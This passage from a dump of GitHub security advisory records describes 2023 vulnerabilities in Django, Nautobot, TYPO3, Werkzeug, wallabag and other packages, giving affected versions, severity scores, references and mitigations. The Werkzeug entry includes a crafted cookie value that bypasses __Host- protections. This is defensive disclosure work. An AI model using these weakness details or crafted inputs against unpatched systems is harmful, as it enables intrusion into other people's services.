'sgx-dcap-quote-verify-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mithril-security/sgx-dcap-quote-verify-python/security/advisories/GHSA-344m-qcjq-xgrf'}, {'type': 'PACKAGE', 'url': 'https://github.com/mithril-security/sgx-dcap-quote-verify-python'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:30:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-2hrw-hx67-34x6,2023-02-23T21:23:27Z,2023-02-15T03:30:47Z,,['CVE-2023-24580'],Resource exhaustion in Django,"An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.7'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24580'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/628b33a854a9c68ec8a0c51f382f304a0044ec92'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/83f1ea83e4553e211c1c5a0dfc197b66d4e50432'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/a665ed5179f5bbd3db95ce67286d0192eff041d8'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/4.1/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/02/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FKYVMMR7RPM6AHJ2SBVM2LO6D3NGFY7B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HWY6DQWRVBALV73BPUVBXC3QIYUM24IK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LTZVAKU5ALQWOKFTPISE257VCVIYGFQI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VZS4G6NSZWPTVXMMZHJOJVQEPL3QTO77/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YJB6FUBBLVKKG655UMTLQNN6UQ6EDLSP/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230316-0006/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2023/feb/14/security-releases/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/14/1'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T17:42:14Z', 'nvd_published_at': '2023-02-15T01:15:00Z'}" 1.4.0,GHSA-8mfq-f5wj-vw5m,2023-03-03T23:16:35Z,2023-02-22T00:04:02Z,,['CVE-2023-25657'],Nautobot vulnerable to remote code execution via Jinja2 template rendering,"### Impact _What kind of vulnerability is it? Who is impacted?_ All users of Nautobot versions earlier than 1.5.7 are impacted. In Nautobot 1.5.7 we have enabled sandboxed environments for the Jinja2 template engine used internally for template rendering for the following objects: - `extras.ComputedField` - `extras.CustomLink` - `extras.ExportTemplate` - `extras.Secret` - `extras.Webhook` While we are not aware of any active exploits, we have made this change as a preventative measure to protect against any potential remote code execution attacks utilizing maliciously crafted template code. This change forces the Jinja2 template engine to use a [`SandboxedEnvironment`](https://jinja.palletsprojects.com/en/3.0.x/sandbox/#sandbox) on all new installations of Nautobot. This addresses any potential unsafe code execution everywhere the helper function `nautobot.utilities.utils.render_jinja2` is called. Additionally, our documentation that was previously suggesting the direct use of `jinja2.Template` has been revised to utilize `render_jinja2`. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes. Users should upgrade to Nautobot 1.5.7 or newer. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ##### Enabling Sandboxed Environments For users that are unable to upgrade to the latest release of Nautobot, you may add the following setting to your `nautobot_config.py` to apply the sandbox environment enforcement: ```python TEMPLATES[1][""OPTIONS""][""environment""] = ""jinja2.sandbox.SandboxedEnvironment"" ``` After applying this change, you must restart all Nautobot services, including any Celery worker processes. **Note:** *Nautobot specifies two template engines by default, the first being “django” for the Django built-in template engine, and the second being “jinja” for the Jinja2 template engine. This recommended setting will update the second item in the list of template engines, which is the Jinja2 engine.* ##### Restricting Jinja2 using Access Controls For users that are unable to immediately update their configuration such as if a Nautobot service restart is too disruptive to operations, access to provide custom Jinja2 template values may be mitigated using permissions to restrict “change” (write) actions to the affected object types listed in the first section. **Note:** *This solution is intended to be stopgap until you can successfully update your `nautobot_config.py` or upgrade your Nautobot instance to apply the sandboxed environment enforcement.* #### Updating Existing App or Job Code For Nautobot App (formerly plugin) authors or Job authors, additionally we recommend that if you have any custom code that may for example be using `jinaj2.Template` that you no longer use that. Instead, please always use our `nautobot.utilities.utils.render_jinja2` function which will make sure that the centrally-provided Jinja2 template engine with sandboxing enforced is being utilized. Anywhere you’ve been using this pattern: ```python from jinja2 import Template my_template = Template(template_code) config = my_template.render(context) ``` We recommend that you replace it with this pattern: ```python from nautobot.utilities.utils import render_jinja2 config = render_jinja2(template_code, context) ``` ### References _Are there any links users can visit to find out more?_ Please see the Nautobot 1.5.7 release notes. https://docs.nautobot.com/projects/core/en/stable/release-notes/version-1.5/#v157-2023-01-04","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nautobot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nautobot/nautobot/security/advisories/GHSA-8mfq-f5wj-vw5m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25657'}, {'type': 'WEB', 'url': 'https://github.com/nautobot/nautobot/commit/d47f157e83b0c353bb2b697f911882c71cf90ca0'}, {'type': 'WEB', 'url': 'https://docs.nautobot.com/projects/core/en/stable/release-notes/version-1.5/#v157-2023-01-04'}, {'type': 'PACKAGE', 'url': 'https://github.com/nautobot/nautobot'}, {'type': 'WEB', 'url': 'https://jinja.palletsprojects.com/en/3.0.x/sandbox/#sandbox'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:02Z', 'nvd_published_at': '2023-02-21T21:15:00Z'}" 1.4.0,GHSA-g9ph-r9hc-34r8,2023-02-22T19:16:24Z,2023-02-21T00:30:20Z,,['CVE-2021-32853'],Erxes vulnerable to Cross-site Scripting,"Erxes, an experience operating system (XOS) with a set of plugins, is vulnerable to cross-site scripting in all versions. This results in client-side code execution. The victim must follow a malicious link or be redirected there from malicious web site. There are no known patches.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'erxes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32853'}, {'type': 'PACKAGE', 'url': 'https://github.com/erxes/erxes'}, {'type': 'WEB', 'url': 'https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54'}, {'type': 'WEB', 'url': 'https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-103-erxes/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:24Z', 'nvd_published_at': '2023-02-20T23:15:00Z'}" 1.4.0,GHSA-gvg3-83q4-rfhq,2023-02-22T22:17:59Z,2023-02-14T15:30:28Z,,['CVE-2023-25141'],Command injection in Apache Sling,"Apache Sling JCR Base < 3.1.12 has a critical injection vulnerability when running on old JDK versions (JDK 1.8.191 or earlier) through utility functions in RepositoryAccessor. The functions getRepository and getRepositoryFromURL allow an application to access data stored in a remote location via JDNI and RMI. Users of Apache Sling JCR Base are recommended to upgrade to Apache Sling JCR Base 3.1.12 or later, or to run on a more recent JDK.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.jcr.base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25141'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base/commit/6ed0a030fd5f13774aff0073c55cbe3ace0153cb'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base/commit/779d8a7dd0437a4f31de02c0d995afcf83b9904b'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SLING-11770'}, {'type': 'WEB', 'url': 'https://sling.apache.org/news.html'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:24:47Z', 'nvd_published_at': '2023-02-14T13:15:00Z'}" 1.4.0,GHSA-qh6w-pq52-qxxq,2023-03-01T01:49:02Z,2023-02-19T03:30:18Z,,['CVE-2023-0914'],Pixelfed may allow unauthorized actor to view private posts,Improper Authorization in GitHub repository pixelfed/pixelfed 0.11.4 and prior.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pixelfed/pixelfed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.11.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0914'}, {'type': 'WEB', 'url': 'https://github.com/pixelfed/pixelfed/commit/ef56f92c3d77e9bafaa70c08b7c04d5a61b8d454'}, {'type': 'PACKAGE', 'url': 'https://github.com/pixelfed/pixelfed'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/54d5fd76-e038-4eda-9e03-d5e95e09c0ec'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:37Z', 'nvd_published_at': '2023-02-19T01:15:00Z'}" 1.4.0,GHSA-7j9m-j397-g4wx,2023-03-03T22:58:41Z,2023-02-21T21:30:18Z,,['CVE-2022-48282'],MongoDB .NET/C# Driver vulnerable to Deserialization of Untrusted Data,"Under very specific circumstances, a privileged user is able to cause arbitrary code to be executed which may cause further disruption to services. This is specific to applications written in C#. This affects all MongoDB .NET/C# Driver versions prior to and including v2.18.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'MongoDB.Driver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.19.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48282'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongodb/mongo-csharp-driver'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-csharp-driver/releases/tag/v2.19.0'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/CSHARP-4475'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CSHARP-4475'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:58:41Z', 'nvd_published_at': '2023-02-21T19:15:00Z'}" 1.4.0,GHSA-qwx8-mxxx-mg96,2023-02-02T19:27:29Z,2023-02-02T19:26:44Z,,['CVE-2023-0609'],wallabag contains Improper Authorization via export feature,"# Description The export feature lets a user export a single entry or a set of entries in a given format (_e.g. PDF, MOBI, TXT_). For example, `https://yourinstance.wallabag.org/export/45.pdf` will export the entry with id 45 in PDF format. Since wallabag 2.0.0-alpha.1, this feature is vulnerable to an insecure direct object reference attack. A logged user can export any single entry without ownership validation. This is due to a lack of access validation in the `downloadEntryAction` method. **You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration.** # Resolution A user check is now done in the vulnerable method before sending the exported entry. The `Entry` retrieval through a `ParamConverter` has also been replaced with a call to the `EntryRepository` in order to prevent any information disclosure through response discrepancy. # Workaround If you are unable to update to the latest version or if you want to temporarily limit risk of exploitation, you may consider blocking requests to the endpoint `/export/*`. E.g. with nginx: ``` nginx location /export { deny all; } ``` # Credits We would like to thank @bAuh0lz for reporting this issue through huntr.dev. Reference: https://www.huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-qwx8-mxxx-mg96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0609'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/0f7460dbab9e29f4f7d2944aca20210f828b6abb'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-mjv2-6jv4-vrg7,2023-03-03T23:11:14Z,2023-02-23T15:33:05Z,,['CVE-2023-0867'],OpenNMS Meridian and Horizon vulnerable to Cross-site Scripting,Multiple stored and reflected cross-site scripting vulnerabilities in webapp jsp pages in multiple versions of OpenNMS Meridian and Horizon could allow an attacker access to confidential session information.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0867'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5765'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/9a366e6822479579e642b58058568af37658baba'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2022/releasenotes/changelog.html#releasenotes-changelog-Meridian-2022.1.13'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:11:14Z', 'nvd_published_at': '2023-02-23T15:15:00Z'}" 1.4.0,GHSA-px8h-6qxv-m22q,2023-02-15T15:37:03Z,2023-02-15T15:37:03Z,,['CVE-2023-23934'],Incorrect parsing of nameless cookies leads to __Host- cookies bypass,"Browsers may allow ""nameless"" cookies that look like `=value` instead of `key=value`. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like `=__Host-test=bad` for another subdomain. Werkzeug <= 2.2.2 will parse the cookie `=__Host-test=bad` as `__Host-test=bad`. If a Werkzeug application is running next to a vulnerable or malicious subdomain which sets such a cookie using a vulnerable browser, the Werkzeug application will see the bad cookie value but the valid cookie key.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Werkzeug'}, 'ecosystem_specific': {'affected_functions': ['werkzeug.http.parse_cookie']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/security/advisories/GHSA-px8h-6qxv-m22q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23934'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/commit/cf275f42acad1b5950c50ffe8ef58fe62cdce028'}, {'type': 'PACKAGE', 'url': 'https://github.com/pallets/werkzeug'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/releases/tag/2.2.3'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5470'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:37:03Z', 'nvd_published_at': '2023-02-14T20:15:00Z'}" 1.4.0,GHSA-vf8h-2wwj-jq22,2023-06-27T21:05:30Z,2023-02-15T12:30:26Z,,['CVE-2022-42735'],Privilege escalation in Apache ShenYu,Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shenyu:shenyu-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-42735'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/pull/3958'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shenyu'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/2k8764jmckmc19qc8x51nlnngq71pcf7'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:16:56Z', 'nvd_published_at': '2023-02-15T10:15:00Z'}" 1.4.0,GHSA-qgc7-mgm3-q253,2023-06-13T23:47:06Z,2023-02-17T13:59:44Z,,['CVE-2022-41727'],Uncontrolled Resource Consumption in golang.org/x/image,An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41727'}, {'type': 'WEB', 'url': 'https://go.dev/cl/468195'}, {'type': 'WEB', 'url': 'https://go.dev/issue/58003'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1572'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T13:59:44Z', 'nvd_published_at': '2023-02-28T18:15:00Z'}" 1.4.0,GHSA-6fcj-9vfw-jq2m,2023-02-23T22:07:44Z,2023-02-13T21:31:04Z,,['CVE-2023-24188'],Arbitrary file deletion in ureport,ureport v2.2.9 was discovered to contain an arbitrary file deletion vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.ureport:ureport2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24188'}, {'type': 'WEB', 'url': 'https://github.com/Venus-WQLab/bug_report/blob/main/ureport/ureport-cve-2023-24188.md'}, {'type': 'WEB', 'url': 'https://github.com/cgddgc/vulns/blob/main/ureport2-filedelete-vuln.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/youseries/ureport'}, {'type': 'WEB', 'url': 'http://ureport.com'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:28:52Z', 'nvd_published_at': '2023-02-13T20:15:00Z'}" 1.4.0,GHSA-mgmm-cmhj-2h5f,2023-03-03T00:15:14Z,2023-02-22T09:30:18Z,,['CVE-2023-0949'],modoboa Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Reflected in GitHub repository modoboa/modoboa prior to 2.0.45.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0949'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/aa74e9a4a870162eea169e0a6a2eab841f8811b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ef87be4e-493b-4ee9-9738-44c55b8acc19'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:30Z', 'nvd_published_at': '2023-02-22T09:15:00Z'}" 1.4.0,GHSA-r4f8-f93x-5qh3,2023-02-16T19:07:25Z,2023-02-08T21:33:24Z,,['CVE-2023-24814'],TYPO3 is vulnerable to Cross-Site Scripting via frontend rendering,"> ### CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L/E:F/RL:O/RC:C` (8.2) ### Problem TYPO3 core component `GeneralUtility::getIndpEnv()` uses the unfiltered server environment variable `PATH_INFO`, which allows attackers to inject malicious content. In combination with the TypoScript setting [`config.absRefPrefix=auto`](https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/frontend/Classes/Controller/TypoScriptFrontendController.php#L2547-L2549), attackers can inject malicious HTML code into pages that have not yet been rendered and cached. As a result, injected values would be cached and delivered to other website visitors (persisted cross-site scripting). Individual code which relies on the resolved value of [`GeneralUtility::getIndpEnv('SCRIPT_NAME')`](https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/core/Classes/Utility/GeneralUtility.php#L2481-L2484) and corresponding usages (as shown below) are vulnerable as well. - `GeneralUtility::getIndpEnv('PATH_INFO') ` - `GeneralUtility::getIndpEnv('SCRIPT_NAME') ` - `GeneralUtility::getIndpEnv('TYPO3_REQUEST_DIR')` - `GeneralUtility::getIndpEnv('TYPO3_REQUEST_SCRIPT')` - `GeneralUtility::getIndpEnv('TYPO3_SITE_PATH')` - `GeneralUtility::getIndpEnv('TYPO3_SITE_SCRIPT')` - `GeneralUtility::getIndpEnv('TYPO3_SITE_URL')` Installations of TYPO3 versions 8.7 and 9.x are probably only affected when server environment variable [`TYPO3_PATH_ROOT`](https://docs.typo3.org/m/typo3/reference-coreapi/9.5/en-us/ApiOverview/Environment/Index.html#configuring-environment-paths) is defined - which is the case if they were installed via Composer. Additional investigations confirmed that Apache and Microsoft IIS web servers using PHP-CGI (FPM, FCGI/FastCGI, or similar) are affected. There might be the risk that nginx is vulnerable as well. It was not possible to exploit Apache/mod_php scenarios. ### Solution The usage of server environment variable `PATH_INFO` has been removed from corresponding processings in `GeneralUtility::getIndpEnv()`. Besides that, the public property `TypoScriptFrontendController::$absRefPrefix` is encoded for both being used as a URI component and for being used as a prefix in an HTML context. This mitigates the cross-site scripting vulnerability. Update to TYPO3 versions 8.7.51 ELTS, 9.5.40 ELTS, 10.4.36 LTS, 11.5.23 LTS and 12.2.0 that fix the problem described above. > ℹ️ **Strong security defaults - Manual actions required** > Any web server using PHP-CGI (FPM, FCGI/FastCGI, or similar) needs to ensure that the PHP setting [**`cgi.fix_pathinfo=1`**](https://www.php.net/manual/en/ini.core.php#ini.cgi.fix-pathinfo) is used, which is the default PHP setting. In case this setting is not enabled, an exception is thrown to avoid continuing with invalid path information. For websites that cannot be patched timely the TypoScript setting [`config.absRefPrefix`](https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Setup/Config/Index.html#absrefprefix) at least should be set to a static path value, instead of using `auto` - e.g. `config.absRefPrefix=/` - this **does not fix all aspects of the vulnerability**, and is just considered to be an intermediate mitigation to the most prominent manifestation. ### References * [TYPO3-CORE-SA-2023-001](https://typo3.org/security/advisory/typo3-core-sa-2023-001) * [TYPO3-CORE-PSA-2023-001](https://typo3.org/security/advisory/typo3-psa-2023-001) *pre-announcement*","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.36'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.40'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.7.0'}, {'fixed': '8.7.51'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.35'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-r4f8-f93x-5qh3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24814'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/0005a6fd86ab97eff8bf2e3a5828bf0e7cb6263a'}, {'type': 'WEB', 'url': 'https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Setup/Config/Index.html#absrefprefix'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2023-24814.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/core/Classes/Utility/GeneralUtility.php#L2481-L2484'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/frontend/Classes/Controller/TypoScriptFrontendController.php#L2547-L2549'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-001'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-psa-2023-001'}]","{'cwe_ids': 